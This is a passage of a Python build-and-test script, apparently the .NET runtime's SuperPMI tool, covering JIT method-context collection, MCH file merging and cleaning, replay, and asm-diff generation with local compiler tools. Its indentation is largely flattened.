async def run_pmi(print_prefix, assembly, self):
""" Run pmi over all dlls
"""
command = [self.corerun, self.pmi_location, "DRIVEALL", assembly]
command_string = " ".join(command)
logging.debug("%s%s", print_prefix, command_string)
# Save the stdout and stderr to files, so we can see if PMI wrote any interesting messages.
# Use the name of the assembly as the basename of the file. mkstemp() will ensure the file
# is unique.
root_output_filename = make_safe_filename("pmi_" + assembly + "_")
try:
stdout_file_handle, stdout_filepath = tempfile.mkstemp(suffix=".stdout", prefix=root_output_filename, dir=self.temp_location)
stderr_file_handle, stderr_filepath = tempfile.mkstemp(suffix=".stderr", prefix=root_output_filename, dir=self.temp_location)
proc = await asyncio.create_subprocess_shell(
command_string,
stdout=stdout_file_handle,
stderr=stderr_file_handle)
await proc.communicate()
os.close(stdout_file_handle)
os.close(stderr_file_handle)
# No need to keep zero-length files
if is_zero_length_file(stdout_filepath):
os.remove(stdout_filepath)
if is_zero_length_file(stderr_filepath):
os.remove(stderr_filepath)
return_code = proc.returncode
if return_code != 0:
logging.debug("'%s': Error return code: %s", command_string, return_code)
write_file_to_log(stdout_filepath, log_level=logging.DEBUG)
write_file_to_log(stderr_filepath, log_level=logging.DEBUG)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(root_output_filename, format(ose)))
else:
raise ose
# Set environment variables.
pmi_command_env = env_copy.copy()
pmi_complus_env = complus_env.copy()
pmi_complus_env["JitName"] = self.collection_shim_name
set_and_report_env(pmi_command_env, root_env, pmi_complus_env)
old_env = os.environ.copy()
os.environ.update(pmi_command_env)
helper = AsyncSubprocessHelper(assemblies, verbose=True)
helper.run_to_completion(run_pmi, self)
                # os.environ.update(old_env) alone would not remove variables added by the PMI
                # update above, so clear the environment before restoring the saved copy.
                os.environ.clear()
                os.environ.update(old_env)
################################################################################################ end of "self.coreclr_args.pmi is True"
################################################################################################ Do collection using crossgen
if self.coreclr_args.crossgen is True:
logging.debug("Starting collection using crossgen")
async def run_crossgen(print_prefix, assembly, self):
""" Run crossgen over all dlls
"""
root_crossgen_output_filename = make_safe_filename("crossgen_" + assembly) + ".out.dll"
crossgen_output_assembly_filename = os.path.join(self.temp_location, root_crossgen_output_filename)
try:
if os.path.exists(crossgen_output_assembly_filename):
os.remove(crossgen_output_assembly_filename)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(crossgen_output_assembly_filename, format(ose)))
return
else:
raise ose
command = [self.crossgen_tool, "/Platform_Assemblies_Paths", self.core_root, "/in", assembly, "/out", crossgen_output_assembly_filename]
command_string = " ".join(command)
logging.debug("%s%s", print_prefix, command_string)
# Save the stdout and stderr to files, so we can see if crossgen wrote any interesting messages.
# Use the name of the assembly as the basename of the file. mkstemp() will ensure the file
# is unique.
root_output_filename = make_safe_filename("crossgen_" + assembly + "_")
try:
stdout_file_handle, stdout_filepath = tempfile.mkstemp(suffix=".stdout", prefix=root_output_filename, dir=self.temp_location)
stderr_file_handle, stderr_filepath = tempfile.mkstemp(suffix=".stderr", prefix=root_output_filename, dir=self.temp_location)
proc = await asyncio.create_subprocess_shell(
command_string,
stdout=stdout_file_handle,
stderr=stderr_file_handle)
await proc.communicate()
os.close(stdout_file_handle)
os.close(stderr_file_handle)
# No need to keep zero-length files
if is_zero_length_file(stdout_filepath):
os.remove(stdout_filepath)
if is_zero_length_file(stderr_filepath):
os.remove(stderr_filepath)
return_code = proc.returncode
if return_code != 0:
logging.debug("'%s': Error return code: %s", command_string, return_code)
write_file_to_log(stdout_filepath, log_level=logging.DEBUG)
write_file_to_log(stderr_filepath, log_level=logging.DEBUG)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(root_output_filename, format(ose)))
else:
raise ose
# Set environment variables.
crossgen_command_env = env_copy.copy()
crossgen_complus_env = complus_env.copy()
crossgen_complus_env["JitName"] = self.collection_shim_name
set_and_report_env(crossgen_command_env, root_env, crossgen_complus_env)
old_env = os.environ.copy()
os.environ.update(crossgen_command_env)
helper = AsyncSubprocessHelper(assemblies, verbose=True)
helper.run_to_completion(run_crossgen, self)
                # os.environ.update(old_env) alone would not remove variables added by the crossgen
                # update above, so clear the environment before restoring the saved copy.
                os.environ.clear()
                os.environ.update(old_env)
################################################################################################ end of "self.coreclr_args.crossgen is True"
################################################################################################ Do collection using crossgen2
if self.coreclr_args.crossgen2 is True:
logging.debug("Starting collection using crossgen2")
async def run_crossgen2(print_prefix, assembly, self):
""" Run crossgen2 over all dlls
"""
root_crossgen2_output_filename = make_safe_filename("crossgen2_" + assembly) + ".out.dll"
crossgen2_output_assembly_filename = os.path.join(self.temp_location, root_crossgen2_output_filename)
try:
if os.path.exists(crossgen2_output_assembly_filename):
os.remove(crossgen2_output_assembly_filename)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(crossgen2_output_assembly_filename, format(ose)))
return
else:
raise ose
root_output_filename = make_safe_filename("crossgen2_" + assembly + "_")
# Create a temporary response file to put all the arguments to crossgen2 (otherwise the path length limit could be exceeded):
#
# <dll to compile>
# -o:<output dll>
# -r:<Core_Root>\System.*.dll
# -r:<Core_Root>\Microsoft.*.dll
# -r:<Core_Root>\mscorlib.dll
# -r:<Core_Root>\netstandard.dll
# --jitpath:<self.collection_shim_name>
# --codegenopt:<option>=<value> /// for each member of complus_env
#
# invoke with:
#
# dotnet <Core_Root>\crossgen2\crossgen2.dll @<temp.rsp>
#
# where "dotnet" is one of:
# 1. <runtime_root>\dotnet.cmd/sh
# 2. "dotnet" on PATH
# 3. corerun in Core_Root
rsp_file_handle, rsp_filepath = tempfile.mkstemp(suffix=".rsp", prefix=root_output_filename, dir=self.temp_location)
with open(rsp_file_handle, "w") as rsp_write_handle:
rsp_write_handle.write(assembly + "\n")
rsp_write_handle.write("-o:" + crossgen2_output_assembly_filename + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "System.*.dll") + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "Microsoft.*.dll") + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "mscorlib.dll") + "\n")
rsp_write_handle.write("-r:" + os.path.join(self.core_root, "netstandard.dll") + "\n")
rsp_write_handle.write("--parallelism:1" + "\n")
rsp_write_handle.write("--jitpath:" + os.path.join(self.core_root, self.collection_shim_name) + "\n")
for var, value in complus_env.items():
rsp_write_handle.write("--codegenopt:" + var + "=" + value + "\n")
# Log what is in the response file
write_file_to_log(rsp_filepath)
command = [self.crossgen2_driver_tool, self.coreclr_args.crossgen2_tool_path, "@" + rsp_filepath]
command_string = " ".join(command)
logging.debug("%s%s", print_prefix, command_string)
# Save the stdout and stderr to files, so we can see if crossgen2 wrote any interesting messages.
# Use the name of the assembly as the basename of the file. mkstemp() will ensure the file
# is unique.
try:
stdout_file_handle, stdout_filepath = tempfile.mkstemp(suffix=".stdout", prefix=root_output_filename, dir=self.temp_location)
stderr_file_handle, stderr_filepath = tempfile.mkstemp(suffix=".stderr", prefix=root_output_filename, dir=self.temp_location)
proc = await asyncio.create_subprocess_shell(
command_string,
stdout=stdout_file_handle,
stderr=stderr_file_handle)
await proc.communicate()
os.close(stdout_file_handle)
os.close(stderr_file_handle)
# No need to keep zero-length files
if is_zero_length_file(stdout_filepath):
os.remove(stdout_filepath)
if is_zero_length_file(stderr_filepath):
os.remove(stderr_filepath)
return_code = proc.returncode
if return_code != 0:
logging.debug("'%s': Error return code: %s", command_string, return_code)
write_file_to_log(stdout_filepath, log_level=logging.DEBUG)
write_file_to_log(stderr_filepath, log_level=logging.DEBUG)
except OSError as ose:
if "[WinError 32] The process cannot access the file because it is being used by another " \
"process:" in format(ose):
logging.warning("Skipping file %s. Got error: %s".format(root_output_filename, format(ose)))
else:
raise ose
# Delete the response file unless we are skipping cleanup
if not self.coreclr_args.skip_cleanup:
os.remove(rsp_filepath)
# Set environment variables.
crossgen2_command_env = env_copy.copy()
set_and_report_env(crossgen2_command_env, root_env)
old_env = os.environ.copy()
os.environ.update(crossgen2_command_env)
            # Note: crossgen2 compiles in parallel by default. However, that seems to lead to sharing
            # violations in SuperPMI collection when accessing the MC file. So, disable crossgen2
            # parallelism with the "--parallelism:1" switch, and allow coarse-grained (per-assembly)
            # parallelism here instead. This turns out to work better anyway, as there is a lot of
            # non-parallel time between crossgen2 parallel compilations.
helper = AsyncSubprocessHelper(assemblies, verbose=True)
helper.run_to_completion(run_crossgen2, self)
# Review: does this delete the items that weren't there before we updated with the crossgen2 variables?
os.environ.update(old_env)
################################################################################################ end of "self.coreclr_args.crossgen2 is True"
mc_files = [os.path.join(self.temp_location, item) for item in os.listdir(self.temp_location) if item.endswith(".mc")]
if len(mc_files) == 0:
raise RuntimeError("No .mc files generated.")
def __merge_mc_files__(self):
""" Merge the mc files that were generated
Notes:
mcs -merge <s_baseMchFile> <s_tempDir>\\*.mc -recursive -dedup -thin
"""
logging.info("Merging MC files")
pattern = os.path.join(self.temp_location, "*.mc")
command = [self.mcs_path, "-merge", self.base_mch_file, pattern, "-recursive", "-dedup", "-thin"]
run_and_log(command)
if not os.path.isfile(self.base_mch_file):
raise RuntimeError("MCH file failed to be generated at: %s" % self.base_mch_file)
# All the individual MC files are no longer necessary, now that we have
# merged them into the base.mch. Delete them.
if not self.coreclr_args.skip_cleanup:
mc_files = [os.path.join(self.temp_location, item) for item in os.listdir(self.temp_location) if item.endswith(".mc")]
for item in mc_files:
os.remove(item)
def __merge_mch_files__(self):
""" Merge MCH files in the mch_files list. This is only used with the `--merge_mch_files` argument.
Notes:
mcs -concat <s_baseMchFile> [self.coreclr_args.mch_files]
"""
logging.info("Merging MCH files")
for item in self.coreclr_args.mch_files:
command = [self.mcs_path, "-concat", self.base_mch_file, item]
run_and_log(command)
if not os.path.isfile(self.base_mch_file):
raise RuntimeError("MCH file failed to be generated at: %s" % self.base_mch_file)
def __create_clean_mch_file__(self):
""" Create a clean mch file
Notes:
<SuperPMIPath> -p -f <s_baseFailMclFile> <s_baseMchFile> <jitPath>
if <s_baseFailMclFile> is non-empty:
<mcl> -strip <s_baseFailMclFile> <s_baseMchFile> <s_finalMchFile>
else
# copy/move base file to final file
del <s_baseFailMclFile>
"""
logging.info("Cleaning MCH file")
command = [self.superpmi_path, "-p", "-f", self.base_fail_mcl_file, self.base_mch_file, self.jit_path]
run_and_log(command)
if is_nonzero_length_file(self.base_fail_mcl_file):
command = [self.mcs_path, "-strip", self.base_fail_mcl_file, self.base_mch_file, self.final_mch_file]
run_and_log(command)
else:
# Ideally we could just rename this file instead of copying it.
shutil.copy2(self.base_mch_file, self.final_mch_file)
if not os.path.isfile(self.final_mch_file):
raise RuntimeError("Final mch file failed to be generated.")
if not self.coreclr_args.skip_cleanup:
if os.path.isfile(self.base_fail_mcl_file):
os.remove(self.base_fail_mcl_file)
self.base_fail_mcl_file = None
if os.path.isfile(self.base_mch_file):
os.remove(self.base_mch_file)
self.base_mch_file = None
def __create_toc__(self):
""" Create a TOC file
Notes:
<mcl> -toc <s_finalMchFile>
"""
logging.info("Creating TOC file")
command = [self.mcs_path, "-toc", self.final_mch_file]
run_and_log(command)
if not os.path.isfile(self.toc_file):
raise RuntimeError("Error, toc file not created correctly at: %s" % self.toc_file)
def __verify_final_mch__(self):
""" Verify the resulting MCH file is error-free when running SuperPMI against it with the same JIT used for collection.
Notes:
<SuperPmiPath> -p -f <s_finalFailMclFile> <s_finalMchFile> <jitPath>
"""
logging.info("Verifying MCH file")
mch_files = [ self.final_mch_file ]
spmi_replay = SuperPMIReplay(self.coreclr_args, mch_files, self.jit_path)
passed = spmi_replay.replay()
if not passed:
raise RuntimeError("Error, unclean replay.")
################################################################################
# SuperPMI Replay helpers
################################################################################
def print_superpmi_failure_code(return_code, coreclr_args):
""" Print a description of a superpmi return (error) code. If the return code is
zero, meaning success, don't print anything.
Note that Python treats process return codes (at least on Windows) as
unsigned integers, so compare against both signed and unsigned numbers for
those return codes.
"""
if return_code == 0:
# Don't print anything if the code is zero, which is success.
pass
elif return_code == -1 or return_code == 4294967295:
logging.error("General fatal error")
elif return_code == -2 or return_code == 4294967294:
logging.error("JIT failed to initialize")
elif return_code == 1:
logging.warning("Compilation failures")
elif return_code == 2:
logging.warning("Asm diffs found")
elif return_code == 3:
logging.warning("SuperPMI missing data encountered")
elif return_code == 139 and coreclr_args.host_os != "windows":
logging.error("Fatal error, SuperPMI has returned SIGSEGV (segmentation fault)")
else:
logging.error("Unknown error code %s", return_code)
def print_fail_mcl_file_method_numbers(fail_mcl_file):
""" Given a SuperPMI ".mcl" file (containing a list of failure indices), print out the method numbers.
"""
with open(fail_mcl_file) as file_handle:
mcl_lines = file_handle.readlines()
mcl_lines = [item.strip() for item in mcl_lines]
logging.debug("Method numbers with compilation failures:")
for line in mcl_lines:
logging.debug(line)
def save_repro_mc_files(temp_location, coreclr_args, repro_base_command_line):
""" For commands that use the superpmi "-r" option to create "repro" .mc files, copy these to a
location where they are saved (and not in a "temp" directory) for easy use by the user.
"""
# If there are any .mc files, drop them into artifacts/repro/<host_os>.<arch>.<build_type>/*.mc
mc_files = [os.path.join(temp_location, item) for item in os.listdir(temp_location) if item.endswith(".mc")]
if len(mc_files) > 0:
repro_location = create_unique_directory_name(coreclr_args.spmi_location, "repro.{}.{}.{}".format(coreclr_args.host_os, coreclr_args.arch, coreclr_args.build_type))
repro_files = []
for item in mc_files:
repro_files.append(os.path.join(repro_location, os.path.basename(item)))
logging.debug("Copying %s -> %s", item, repro_location)
shutil.copy2(item, repro_location)
logging.info("")
logging.info("Repro .mc files created for failures:")
for item in repro_files:
logging.info(item)
logging.info("")
logging.info("To run a specific failure (replace JIT path and .mc filename as needed):")
logging.info("")
logging.info("%s %s%sxxxxx.mc", repro_base_command_line, repro_location, os.path.sep)
logging.info("")
################################################################################
# SuperPMI Replay
################################################################################
class SuperPMIReplay:
""" SuperPMI Replay class
Notes:
The object is responsible for replaying the MCH files given to the
instance of the class
"""
def __init__(self, coreclr_args, mch_files, jit_path):
""" Constructor
Args:
coreclr_args (CoreclrArguments) : parsed args
mch_files (list) : list of MCH files to replay
jit_path (str) : path to clrjit
"""
self.jit_path = jit_path
self.mch_files = mch_files
self.superpmi_path = determine_superpmi_tool_path(coreclr_args)
self.coreclr_args = coreclr_args
############################################################################
# Instance Methods
############################################################################
def replay(self):
""" Replay the given SuperPMI collection
Returns:
(bool) True on success; False otherwise
"""
result = True # Assume success
# Possible return codes from SuperPMI
#
# 0 : success
# -1 : general fatal error (e.g., failed to initialize, failed to read files)
# -2 : JIT failed to initialize
# 1 : there were compilation failures
# 2 : there were assembly diffs
with TempDir() as temp_location:
logging.debug("")
logging.debug("Temp Location: %s", temp_location)
logging.debug("")
# `repro_flags` are the subset of flags we tell the user to pass to superpmi when reproducing
# a failure. This won't include things like "-p" for parallelism or "-r" to create a repro .mc file.
repro_flags = []
common_flags = [
"-v", "ew", # only display errors and warnings
"-r", os.path.join(temp_location, "repro") # Repro name, create .mc repro files
]
if self.coreclr_args.altjit:
repro_flags += [
"-jitoption", "force", "AltJit=*",
"-jitoption", "force", "AltJitNgen=*"
]
if self.coreclr_args.arch != self.coreclr_args.target_arch:
repro_flags += [ "-target", self.coreclr_args.target_arch ]
if not self.coreclr_args.sequential:
common_flags += [ "-p" ]
if self.coreclr_args.break_on_assert:
common_flags += [ "-boa" ]
if self.coreclr_args.break_on_error:
common_flags += [ "-boe" ]
if self.coreclr_args.spmi_log_file is not None:
common_flags += [ "-w", self.coreclr_args.spmi_log_file ]
common_flags += repro_flags
# For each MCH file that we are going to replay, do the replay and replay post-processing.
#
# Consider: currently, we loop over all the steps for each MCH file, including (1) invoke
# SuperPMI, (2) process results. It might be better to do (1) for each MCH file, then
# process all the results at once. Currently, the results for some processing can be
# obscured by the normal run output for subsequent MCH files.
# Keep track of any MCH file replay failures
files_with_replay_failures = []
for mch_file in self.mch_files:
logging.info("Running SuperPMI replay of %s", mch_file)
                flags = common_flags.copy()  # copy, so the += below doesn't grow common_flags across iterations
fail_mcl_file = os.path.join(temp_location, os.path.basename(mch_file) + "_fail.mcl")
flags += [
"-f", fail_mcl_file, # Failing mc List
]
command = [self.superpmi_path] + flags + [self.jit_path, mch_file]
return_code = run_and_log(command)
print_superpmi_failure_code(return_code, self.coreclr_args)
if return_code == 0:
logging.info("Clean SuperPMI replay")
else:
files_with_replay_failures.append(mch_file)
result = False
if is_nonzero_length_file(fail_mcl_file):
# Unclean replay. Examine the contents of the fail.mcl file to dig into failures.
if return_code == 0:
logging.warning("Warning: SuperPMI returned a zero exit code, but generated a non-zero-sized mcl file")
print_fail_mcl_file_method_numbers(fail_mcl_file)
repro_base_command_line = "{} {} {}".format(self.superpmi_path, " ".join(repro_flags), self.jit_path)
save_repro_mc_files(temp_location, self.coreclr_args, repro_base_command_line)
if not self.coreclr_args.skip_cleanup:
if os.path.isfile(fail_mcl_file):
os.remove(fail_mcl_file)
fail_mcl_file = None
################################################################################################ end of for mch_file in self.mch_files
logging.info("Replay summary:")
if len(files_with_replay_failures) == 0:
logging.info(" All replays clean")
else:
logging.info(" Replay failures in %s MCH files:", len(files_with_replay_failures))
for file in files_with_replay_failures:
logging.info(" %s", file)
return result
################################################################################
# SuperPMI Replay/AsmDiffs
################################################################################
class SuperPMIReplayAsmDiffs:
""" SuperPMI Replay AsmDiffs class
Notes:
The object is responsible for replaying the mch file given to the
instance of the class and doing diffs using the two passed jits.
"""
def __init__(self, coreclr_args, mch_files, base_jit_path, diff_jit_path):
""" Constructor
Args:
coreclr_args (CoreclrArguments) : parsed args
mch_files (list) : list of MCH files to replay
base_jit_path (str) : path to baseline clrjit
diff_jit_path (str) : path to diff clrjit
"""
self.base_jit_path = base_jit_path
self.diff_jit_path = diff_jit_path
self.mch_files = mch_files
self.superpmi_path = determine_superpmi_tool_path(coreclr_args)
self.coreclr_args = coreclr_args
self.diff_mcl_contents = None
############################################################################
# Instance Methods
############################################################################
def replay_with_asm_diffs(self):
""" Replay the given SuperPMI collection, generating asm diffs
Returns:
(bool) True on success; False otherwise
"""
result = True # Assume success
# Possible return codes from SuperPMI
#
# 0 : success
# -1 : general fatal error (e.g., failed to initialize, failed to read files)
# -2 : JIT failed to initialize
# 1 : there were compilation failures
# 2 : there were assembly diffs
# Set up some settings we'll use below.
asm_complus_vars = {
"COMPlus_JitDisasm": "*",
"COMPlus_JitUnwindDump": "*",
"COMPlus_JitEHDump": "*",
"COMPlus_NgenDisasm": "*",
"COMPlus_NgenUnwindDump": "*",
"COMPlus_NgenEHDump": "*",
"COMPlus_JitDiffableDasm": "1",
"COMPlus_JitEnableNoWayAssert": "1",
"COMPlus_JitNoForceFallback": "1",
"COMPlus_JitRequired": "1",
"COMPlus_JitDisasmWithGC": "1",
"COMPlus_TieredCompilation": "0" }
if self.coreclr_args.gcinfo:
asm_complus_vars.update({
"COMPlus_JitGCDump": "*",
"COMPlus_NgenGCDump": "*" })
jit_dump_complus_vars = asm_complus_vars.copy()
jit_dump_complus_vars.update({
"COMPlus_JitDump": "*",
"COMPlus_NgenDump": "*" })
target_flags = []
if self.coreclr_args.arch != self.coreclr_args.target_arch:
target_flags += [ "-target", self.coreclr_args.target_arch ]
        # Copy target_flags so the += below doesn't mutate the shared list and leak the
        # asm-diffs-only options into the replay flags.
        altjit_asm_diffs_flags = target_flags.copy()
        altjit_replay_flags = target_flags.copy()
if self.coreclr_args.altjit:
altjit_asm_diffs_flags += [
"-jitoption", "force", "AltJit=*",
"-jitoption", "force", "AltJitNgen=*",
"-jit2option", "force", "AltJit=*",
"-jit2option", "force", "AltJitNgen=*"
]
altjit_replay_flags += [
"-jitoption", "force", "AltJit=*",
"-jitoption", "force", "AltJitNgen=*"
]
# Keep track if any MCH file replay had asm diffs
files_with_asm_diffs = []
files_with_replay_failures = []
with TempDir(self.coreclr_args.temp_dir, self.coreclr_args.skip_cleanup) as temp_location:
logging.debug("")
logging.debug("Temp Location: %s", temp_location)
logging.debug("")
# For each MCH file that we are going to replay, do the replay and replay post-processing.
#
# Consider: currently, we loop over all the steps for each MCH file, including (1) invoke
# SuperPMI, (2) process results. It might be better to do (1) for each MCH file, then
# process all the results at once. Currently, the results for some processing can be
# obscured by the normal run output for subsequent MCH files.
for mch_file in self.mch_files:
logging.info("Running asm diffs of %s", mch_file)
fail_mcl_file = os.path.join(temp_location, os.path.basename(mch_file) + "_fail.mcl")
diff_mcl_file = os.path.join(temp_location, os.path.basename(mch_file) + "_diff.mcl")
# If the user passed -temp_dir, we skip the SuperPMI replay process,
# and rely on what we find from a previous run.
if self.coreclr_args.temp_dir is not None:
return_code = 1
else:
flags = [
"-a", # Asm diffs
"-v", "ew", # only display errors and warnings
"-f", fail_mcl_file, # Failing mc List
"-diffMCList", diff_mcl_file, # Create all of the diffs in an mcl file
"-r", os.path.join(temp_location, "repro") # Repro name, create .mc repro files
]
flags += altjit_asm_diffs_flags
if not self.coreclr_args.sequential:
flags += [ "-p" ]
if self.coreclr_args.break_on_assert:
flags += [ "-boa" ]
if self.coreclr_args.break_on_error:
flags += [ "-boe" ]
if self.coreclr_args.spmi_log_file is not None:
flags += [ "-w", self.coreclr_args.spmi_log_file ]
# Change the working directory to the Core_Root we will call SuperPMI from.
# This is done to allow libcoredistools to be loaded correctly on unix
# as the loadlibrary path will be relative to the current directory.
with ChangeDir(self.coreclr_args.core_root):
command = [self.superpmi_path] + flags + [self.base_jit_path, self.diff_jit_path, mch_file]
return_code = run_and_log(command)
print_superpmi_failure_code(return_code, self.coreclr_args)
if return_code == 0:
logging.info("Clean SuperPMI replay")
else:
files_with_replay_failures.append(mch_file)
result = False
if is_nonzero_length_file(fail_mcl_file):
# Unclean replay. Examine the contents of the fail.mcl file to dig into failures.
if return_code == 0:
logging.warning("Warning: SuperPMI returned a zero exit code, but generated a non-zero-sized mcl file")
print_fail_mcl_file_method_numbers(fail_mcl_file)
repro_base_command_line = "{} {} {}".format(self.superpmi_path, " ".join(altjit_asm_diffs_flags), self.diff_jit_path)
save_repro_mc_files(temp_location, self.coreclr_args, repro_base_command_line)
# There were diffs. Go through each method that created diffs and
# create a base/diff asm file with diffable asm. In addition, create
# a standalone .mc for easy iteration.
if is_nonzero_length_file(diff_mcl_file):
# AsmDiffs. Save the contents of the fail.mcl file to dig into failures.
if return_code == 0:
logging.warning("Warning: SuperPMI returned a zero exit code, but generated a non-zero-sized mcl file")
# This file had asm diffs; keep track of that.
files_with_asm_diffs.append(mch_file)
self.diff_mcl_contents = None
with open(diff_mcl_file) as file_handle:
mcl_lines = file_handle.readlines()
mcl_lines = [item.strip() for item in mcl_lines]
self.diff_mcl_contents = mcl_lines
asm_root_dir = create_unique_directory_name(self.coreclr_args.spmi_location, "asm.{}.{}.{}".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type))
base_asm_location = os.path.join(asm_root_dir, "base")
diff_asm_location = os.path.join(asm_root_dir, "diff")
os.makedirs(base_asm_location)
os.makedirs(diff_asm_location)
if self.coreclr_args.diff_jit_dump:
# If JIT dumps are requested, create a diff and baseline directory for JIT dumps
jitdump_root_dir = create_unique_directory_name(self.coreclr_args.spmi_location, "jitdump.{}.{}.{}".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type))
base_dump_location = os.path.join(jitdump_root_dir, "base")
diff_dump_location = os.path.join(jitdump_root_dir, "diff")
os.makedirs(base_dump_location)
os.makedirs(diff_dump_location)
text_differences = queue.Queue()
jit_dump_differences = queue.Queue()
async def create_replay_artifacts(print_prefix, item, self, mch_file, env_vars, jit_differences_queue, base_location, diff_location, extension):
""" Run superpmi over an MC to create JIT asm or JIT dumps for the method.
"""
# Setup flags to call SuperPMI for both the diff jit and the base jit
flags = [
"-c", item,
"-v", "q" # only log from the jit.
]
flags += altjit_replay_flags
# Add in all the COMPlus variables we need
os.environ.update(env_vars)
# Change the working directory to the core root we will call SuperPMI from.
# This is done to allow libcoredistools to be loaded correctly on unix
# as the LoadLibrary path will be relative to the current directory.
with ChangeDir(self.coreclr_args.core_root):
async def create_one_artifact(jit_path: str, location: str) -> str:
command = [self.superpmi_path] + flags + [jit_path, mch_file]
item_path = os.path.join(location, "{}{}".format(item, extension))
with open(item_path, 'w') as file_handle:
logging.debug("%sGenerating %s", print_prefix, item_path)
logging.debug("%sInvoking: %s", print_prefix, " ".join(command))
proc = await asyncio.create_subprocess_shell(" ".join(command), stdout=file_handle, stderr=asyncio.subprocess.PIPE)
await proc.communicate()
with open(item_path, 'r') as file_handle:
generated_txt = file_handle.read()
return generated_txt
# Generate diff and base JIT dumps
base_txt = await create_one_artifact(self.base_jit_path, base_location)
diff_txt = await create_one_artifact(self.diff_jit_path, diff_location)
if base_txt != diff_txt:
jit_differences_queue.put_nowait(item)
################################################################################################ end of create_replay_artifacts()
                    diff_items = list(self.diff_mcl_contents)
logging.info("Creating dasm files")
subproc_helper = AsyncSubprocessHelper(diff_items, verbose=True)
subproc_helper.run_to_completion(create_replay_artifacts, self, mch_file, asm_complus_vars, text_differences, base_asm_location, diff_asm_location, ".dasm")
if self.coreclr_args.diff_jit_dump:
logging.info("Creating JitDump files")
subproc_helper.run_to_completion(create_replay_artifacts, self, mch_file, jit_dump_complus_vars, jit_dump_differences, base_dump_location, diff_dump_location, ".txt")
logging.info("Differences found. To replay SuperPMI use:")
logging.info("")
for var, value in asm_complus_vars.items():
print_platform_specific_environment_vars(logging.INFO, self.coreclr_args, var, value)
logging.info("%s %s -c ### %s %s", self.superpmi_path, " ".join(altjit_replay_flags), self.diff_jit_path, mch_file)
logging.info("")
if self.coreclr_args.diff_jit_dump:
logging.info("To generate JitDump with SuperPMI use:")
logging.info("")
for var, value in jit_dump_complus_vars.items():
print_platform_specific_environment_vars(logging.INFO, self.coreclr_args, var, value)
logging.info("%s %s -c ### %s %s", self.superpmi_path, " ".join(altjit_replay_flags), self.diff_jit_path, mch_file)
logging.info("")
logging.debug("Method numbers with binary differences:")
for item in self.diff_mcl_contents:
logging.debug(item)
logging.debug("")
try:
current_text_diff = text_differences.get_nowait()
                    except queue.Empty:
current_text_diff = None
logging.info("Generated asm is located under %s %s", base_asm_location, diff_asm_location)
if current_text_diff is not None:
logging.info("Textual differences found in generated asm.")
# Find jit-analyze.bat/sh on PATH, if it exists, then invoke it.
ran_jit_analyze = False
path_var = os.environ.get("PATH")
if path_var is not None:
jit_analyze_file = "jit-analyze.bat" if platform.system() == "Windows" else "jit-analyze.sh"
jit_analyze_path = find_file(jit_analyze_file, path_var.split(os.pathsep))
if jit_analyze_path is not None:
# It appears we have a built jit-analyze on the path, so try to run it.
command = [ jit_analyze_path, "-r", "--base", base_asm_location, "--diff", diff_asm_location ]
run_and_log(command, logging.INFO)
ran_jit_analyze = True
if not ran_jit_analyze:
logging.info("jit-analyze not found on PATH. Generate a diff analysis report by building jit-analyze from https://github.com/dotnet/jitutils and running:")
logging.info(" jit-analyze -r --base %s --diff %s", base_asm_location, diff_asm_location)
else:
logging.warning("No textual differences. Is this an issue with coredistools?")
if self.coreclr_args.diff_jit_dump:
try:
current_jit_dump_diff = jit_dump_differences.get_nowait()
except queue.Empty:
current_jit_dump_diff = None
logging.info("Generated JitDump is located under %s %s", base_dump_location, diff_dump_location)
if current_jit_dump_diff is not None:
logging.info("Textual differences found in generated JitDump.")
else:
logging.warning("No textual differences found in generated JitDump. Is this an issue with coredistools?")
################################################################################################ end of processing asm diffs (if is_nonzero_length_file(diff_mcl_file)...
if not self.coreclr_args.skip_cleanup:
if os.path.isfile(fail_mcl_file):
os.remove(fail_mcl_file)
fail_mcl_file = None
################################################################################################ end of for mch_file in self.mch_files
logging.info("Asm diffs summary:")
if len(files_with_replay_failures) != 0:
logging.info(" Replay failures in %s MCH files:", len(files_with_replay_failures))
for file in files_with_replay_failures:
logging.info(" %s", file)
if len(files_with_asm_diffs) == 0:
logging.info(" No asm diffs")
else:
logging.info(" Asm diffs in %s MCH files:", len(files_with_asm_diffs))
for file in files_with_asm_diffs:
logging.info(" %s", file)
return result
################################################################################################ end of replay_with_asm_diffs()
################################################################################
# Argument handling helpers
################################################################################
def determine_coredis_tools(coreclr_args):
""" Determine the coredistools location. First, look in Core_Root. It will be there if
the setup-stress-dependencies.cmd/sh script has been run, which is typically only
if tests have been run. If unable to find coredistools, download it from a cached
copy in the CLRJIT Azure Storage. (Ideally, we would download the NuGet
package and extract it using the same mechanism as setup-stress-dependencies,
rather than keeping our own copy in Azure Storage.)
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
coredistools_location (str) : path of [lib]coredistools.dylib|so|dll
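For example (illustrative; the exact path depends on Core_Root and the OS),
on a Linux x64 machine this would typically be "<core_root>/libcoredistools.so".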
"""
if not hasattr(coreclr_args, "core_root") or coreclr_args.core_root is None:
raise RuntimeError("Core_Root not set properly")
coredistools_dll_name = None
if coreclr_args.host_os.lower() == "osx":
coredistools_dll_name = "libcoredistools.dylib"
elif coreclr_args.host_os.lower() == "linux":
coredistools_dll_name = "libcoredistools.so"
elif coreclr_args.host_os.lower() == "windows":
coredistools_dll_name = "coredistools.dll"
else:
raise RuntimeError("Unknown host os: {}".format(coreclr_args.host_os))
coredistools_location = os.path.join(coreclr_args.core_root, coredistools_dll_name)
if os.path.isfile(coredistools_location):
logging.info("Using coredistools found at %s", coredistools_location)
else:
# Often, Core_Root will already exist. However, you can do a product build without
# creating a Core_Root, and still successfully run replay or asm diffs, if we create Core_Root
# here and copy coredistools into it. Note that our replays all depend on Core_Root existing, as we
